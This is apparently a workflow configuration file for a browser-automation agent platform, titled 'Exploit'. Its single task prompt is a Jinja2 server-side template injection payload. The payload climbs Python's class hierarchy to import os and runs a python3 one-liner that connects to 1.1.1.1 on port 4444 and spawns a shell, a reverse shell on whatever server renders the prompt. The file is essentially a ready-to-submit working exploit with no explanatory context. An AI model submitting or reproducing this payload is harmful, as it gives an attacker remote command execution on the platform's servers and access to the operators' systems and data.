{ "title": "Exploit", "description": "", "proxy_location": "RESIDENTIAL", "webhook_callback_url": "", "persist_browser_session": false, "model": null, "totp_verification_url": null, "workflow_definition": { "parameters": [], "blocks": [ { "label": "block_1", "continue_on_failure": false, "block_type": "task_v2", "prompt": "{% for x in ().__class__.__base__.__subclasses__() %}\n {% if 'warning' in x.__name__ %}\n {{ x()._module.__builtins__['__import__']('os').popen(\"python3 -c 'import socket,os,pty;s=socket.socket();s.connect((\\\"1.1.1.1\\\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\\\"sh\\\")'\").read() }}\n {% endif %}\n{% endfor %}", "url": "", "max_steps": 25, "totp_identifier": null, "totp_verification_url": null } ] }, "is_saved_task": false }